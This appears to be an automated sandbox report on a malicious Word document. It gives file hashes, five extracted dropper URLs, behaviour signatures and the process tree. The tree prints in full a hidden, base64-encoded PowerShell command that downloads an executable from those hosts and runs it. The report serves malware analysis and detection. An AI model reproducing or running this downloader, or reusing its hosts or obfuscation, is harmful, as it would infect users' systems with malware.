Analysis
-
max time kernel
6s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 03:44
General
-
Target
27a7986a402e6037a9e2a4306d260c27f9d1cf071f59dd3031b06b74e7c4741a.doc
-
Size
122KB
-
MD5
f0a24b5b2777787a702aae58b99cacea
-
SHA1
4c2633e636ebed03d253ae9cb1288dd81cfd07c2
-
SHA256
27a7986a402e6037a9e2a4306d260c27f9d1cf071f59dd3031b06b74e7c4741a
-
SHA512
383f2365550496ad2dd75c24e057eeffcc49a73f7ab5838dbd503d12aaea9db40edac2a062ad8d3309ed68ff0833da24363296065bb6f45d26854a84daad6f8a
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://naft-dz.com/wp-content/cel3xz7ik6_u5a7be-354524163/
exe.dropper
http://fullinnova.com/video/AXINpXSB/
exe.dropper
http://novametal.cl/wp-includes/3r5l_nt34dqjxr7-3/
exe.dropper
http://ortodontagliwice.com.pl/wp-admin/TIPFceap/
exe.dropper
http://avrdevices.ru/Soft/ZIKmwKarDQ/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27a7986a402e6037a9e2a4306d260c27f9d1cf071f59dd3031b06b74e7c4741a.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOADgAMgA3ADUANwA0ADcAPQAnAFYAMwAyADMAOAA2ACcAOwAkAFoANgAyADgAOAA3ADIAOAAgAD0AIAAnADcAOAA5ACcAOwAkAG8ANwAxADgANAA2ADUAPQAnAEYAOAAyADYANgAyADkAJwA7ACQAcQAxADIANAA3ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoANgAyADgAOAA3ADIAOAArACcALgBlAHgAZQAnADsAJABOADgANwAxAF8AOQA9ACcATgA0AF8AXwAyADkANgAnADsAJABJADQAMQA5ADcAOQA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAHQAYAAuAGAAVwBlAEIAYwBMAEkAYABlAE4AVAA7ACQASQA2ADEAMQAxAF8APQAnAGgAdAB0AHAAOgAvAC8AbgBhAGYAdAAtAGQAegAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGMAZQBsADMAeAB6ADcAaQBrADYAXwB1ADUAYQA3AGIAZQAtADMANQA0ADUAMgA0ADEANgAzAC8AQABoAHQAdABwADoALwAvAGYAdQBsAGwAaQBuAG4AbwB2AGEALgBjAG8AbQAvAHYAaQBkAGUAbwAvAEEAWABJAE4AcABYAFMAQgAvAEAAaAB0AHQAcAA6AC8ALwBuAG8AdgBhAG0AZQB0AGEAbAAuAGMAbAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADMAcgA1AGwAXwBuAHQAMwA0AGQAcQBqAHgAcgA3AC0AMwAvAEAAaAB0AHQAcAA6AC8ALwBvAHIAdABvAGQAbwBuAHQAYQBnAGwAaQB3AGkAYwBlAC4AYwBvAG0ALgBwAGwALwB3AHAALQBhAGQAbQBpAG4ALwBUAEkAUABGAGMAZQBhAHAALwBAAGgAdAB0AHAAOgAvAC8AYQB2AHIAZABlAHYAaQBjAGUAcwAuAHIAdQAvAFMAbwBmAHQALwBaAEkASwBtAHcASwBhAHIARABRAC8AJwAuAHMAUABMAGkAVAAoACcAQAAnACkAOwAkAFAAMwAxADAAMQBfADcAPQAnAEEAMABfADkAMQA2ADEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHAANAA0ADMAMABfADEAIABpAG4AIAAkAEkANgAxADEAMQBfACkAewB0AHIAeQB7ACQASQA0ADEAOQA3ADkALgBkAE8AVwBuAEwAbwBBAEQAZgBJAEwAZQAoACQAcAA0ADQAMwAwAF8AMQAsACAAJABxADEAMgA0ADcANgApADsAJABBADEAOQA3ADMANABfAD0AJwBIADgAXwAwADgANQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHEAMQAyADQANwA2ACkALgBMAGUAbgBnAHQASAAgAC0AZwBlACAAMwA2ADkAOAAyACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHEAMQAyADQANwA2ADsAJABmADIAMwA5ADEANAA2AD0AJwBXADYANAA1AF8AOAA0ACcAOwBiAHIAZQBhAGsAOwAkAHUAOABfADkAXwA5ADAANQA9ACcARgAyADYAMAAzAF8ANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABPADEANQAyADYAOQA9ACcAbwA4ADkAMwA3ADMANQBfACcA1⤵
- Process spawned unexpected child process
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB